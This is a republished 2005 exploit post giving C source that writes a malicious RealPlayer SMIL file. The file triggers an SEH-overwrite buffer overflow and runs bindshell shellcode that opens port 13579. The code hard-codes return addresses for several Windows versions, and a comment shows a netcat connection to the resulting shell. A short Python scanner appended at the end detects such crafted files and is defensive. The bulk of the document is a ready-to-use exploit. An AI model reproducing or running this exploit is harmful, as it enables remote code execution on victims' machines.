RealPlayer SMIL File Handling Remote Buffer Overflow Exploit
Source: vfocus.net  Author: nolimit  Published: 2005-03-08


/* RealPlayer .smil file buffer overflow
Coded by nolimit@CiSO & Buzzdee
greets to COREiSO & #news & flare & class101 & ESI & RVL & everyone else I forget
This uses a seh overwrite method, which takes advantage of the SEH being placed
in multiple locations over the different OS's. Because of this, it should be
completely universal. :).
Also, we added SEH for enterprise and Standard, if you have a diff 2k3
then deal with it and write your own in.

C:\tools>nc -vv SERVER 1554
SERVER [192.168.1.93] 1554 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\Program Files\Real\RealPlayer>

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char pre[]=
"<smil>\n"
" <head>\n"
" <layout>\n"
" <region id=\"a\" top=\"5\" />\n"
" </layout>\n"
" </head>\n"
" <body>\n"
" <text src=\"1024_768.en.txt\" region=\"size\" system-screen-size=\"";

char shellcode[]=
/* bindshell port 13579 thx to metasploit.com :)
restricted chars: 0x00, 0x90, 0xa0, 0x20, 0x0a, 0x0d, 0x3c, 0x3e,
0x2f, 0x5c, 0x22, 0x58, 0x3d, 0x3b */
"\x29\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8f"
"\x35\x37\x85\x83\xeb\xfc\xe2\xf4\x73\x5f\xdc\xca\x67\xcc\xc8\x7a"
"\x70\x55\xbc\xe9\xab\x11\xbc\xc0\xb3\xbe\x4b\x80\xf7\x34\xd8\x0e"
"\xc0\x2d\xbc\xda\xaf\x34\xdc\x66\xbf\x7c\xbc\xb1\x04\x34\xd9\xb4"
"\x4f\xac\x9b\x01\x4f\x41\x30\x44\x45\x38\x36\x47\x64\xc1\x0c\xd1"
"\xab\x1d\x42\x66\x04\x6a\x13\x84\x64\x53\xbc\x89\xc4\xbe\x68\x99"
"\x8e\xde\x34\xa9\x04\xbc\x5b\xa1\x93\x54\xf4\xb4\x4f\x51\xbc\xc5"
"\xbf\xbe\x77\x89\x04\x45\x2b\x28\x04\x75\x3f\xdb\xe7\xbb\x79\x8b"
"\x63\x65\xc8\x53\xbe\xee\x51\xd6\xe9\x5d\x04\xb7\xe7\x42\x44\xb7"
"\xd0\x61\xc8\x55\xe7\xfe\xda\x79\xb4\x65\xc8\x53\xd0\xbc\xd2\xe3"
"\x0e\xd8\x3f\x87\xda\x5f\x35\x7a\x5f\x5d\xee\x8c\x7a\x98\x60\x7a"
"\x59\x66\x64\xd6\xdc\x66\x74\xd6\xcc\x66\xc8\x55\xe9\x5d\x02\x8e"
"\xe9\x66\xbe\x64\x1a\x5d\x93\x9f\xff\xf2\x60\x7a\x59\x5f\x27\xd4"
"\xda\xca\xe7\xed\x2b\x98\x19\x6c\xd8\xca\xe1\xd6\xda\xca\xe7\xed"
"\x6a\x7c\xb1\xcc\xd8\xca\xe1\xd5\xdb\x61\x62\x7a\x5f\xa6\x5f\x62"
"\xf6\xf3\x4e\xd2\x70\xe3\x62\x7a\x5f\x53\x5d\xe1\xe9\x5d\x54\xe8"
"\x06\xd0\x5d\xd5\xd6\x1c\xfb\x0c\x68\x5f\x73\x0c\x6d\x04\xf7\x76"
"\x25\xcb\x75\xa8\x71\x77\x1b\x16\x02\x4f\x0f\x2e\x24\x9e\x5f\xf7"
"\x71\x86\x21\x7a\xfa\x71\xc8\x53\xd4\x62\x65\xd4\xde\x64\x5d\x84"
"\xde\x64\x62\xd4\x70\xe5\x5f\x28\x56\x30\xf9\xd6\x70\xe3\x5d\x7a"
"\x70\x02\xc8\x55\x04\x62\xcb\x06\x4b\x51\xc8\x53\xdd\xca\xe7\xed"
"\xf1\xed\xd5\xf6\xdc\xca\xe1\x7a\x5f\x35\x37\x85";


char end[]=
" </body>"
"</smil>";

char overflow[1700];
int main(int argc,char *argv[])
{

FILE *vuln;
if(argc == 1)
{
printf("RealPlayer 10 .smil file local buffer overflow.\n");
printf("Coded by nolimit & buzzdee.\n");
printf("Usage: %s <outputfile>\n",argv[0]);
return 1;
}
vuln = fopen(argv[1],"w");
//build overflow buffer here.
memset(overflow,0x90,sizeof(overflow)); //fill with nops
memcpy(overflow+1068,"\xeb\x08\xeb\x08",4); //jump +8 into nops
memcpy(overflow+1072,"\x4a\xe1\xc9\x61",4); // se handler in win xp (pop pop ret)
memcpy(overflow+1084,"\xeb\x08\xeb\x08",4); //jump +8 into nops
memcpy(overflow+1088,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) for small biz or something
memcpy(overflow+1100,"\xeb\x08\xeb\x08",4); //jump +8 into nops
memcpy(overflow+1104,"\xae\x7f\xA2\x60",4); // se handler in win2k3 (pop pop ret) enterprise
memcpy(overflow+1108,"\xeb\x08\xeb\x08",4); //jump +8 into nops
memcpy(overflow+1112,"\xbf\xbb\xA2\x60",4); //overwrite seh (win2k) with call ebx (pncrt.dll - hopefully universal ...^^)
//our shellcode after some nops to land in; sizeof() includes the terminating NUL,
//so the %s below stops right after the shellcode.
memcpy(overflow+1125,shellcode,sizeof(shellcode));

if(vuln)
{
//Write file
fprintf(vuln,"%s%s\"/>\n%s",pre,overflow,end);
fclose(vuln);
}
printf("File written.Binds a shell on port 13579.\nOpen with realplayer to exploit.\n");
return 0;
}
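A defender-side check for the trigger the exploit above relies on, added here and not part of the original post: it scans the attribute values of a SMIL file and flags any value that is oversized or carries non-printable bytes, which is what a crafted system-screen-size attribute looks like (a legitimate value such as "1024X768" is a few printable bytes). The length threshold and the two sample files are assumptions.

```python
import re

# Attribute values longer than this are far beyond any legitimate screen size
# string ("1024X768" is 8 bytes); the exploit above uses well over 1000 bytes.
# The threshold is an assumption, tune it to your own corpus of SMIL files.
MAX_ATTR_LEN = 64

# Matches name="value" pairs inside SMIL tags. Bytes, not str, because a
# crafted file carries raw NOP sleds and machine code that are not valid text.
ATTR_RE = re.compile(rb'([A-Za-z_][\w:-]*)\s*=\s*"([^"]*)"')


def scan_smil(data: bytes) -> list:
    """Return a list of (attribute name, reason) findings; a clean file yields []."""
    findings = []
    for m in ATTR_RE.finditer(data):
        name, value = m.group(1).decode("ascii"), m.group(2)
        if len(value) > MAX_ATTR_LEN:
            findings.append((name, "oversized value (%d bytes)" % len(value)))
        # Legitimate SMIL attribute values are printable text; raw bytes such
        # as a 0x90 NOP sled or shellcode are a strong indicator of a crafted file.
        if any(b < 0x20 or b > 0x7E for b in value if b not in b"\t\r\n"):
            findings.append((name, "non-printable bytes in value"))
    return findings


# Constructed samples (not taken from the original post).
BENIGN = (b'<smil><body><text src="a.txt" region="size" '
          b'system-screen-size="1024X768"/></body></smil>')
CRAFTED = (b'<smil><body><text src="a.txt" region="size" '
           b'system-screen-size="' + b"\x90" * 1100 + b'"/></body></smil>')

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, scan_smil(sample) or "no findings")
```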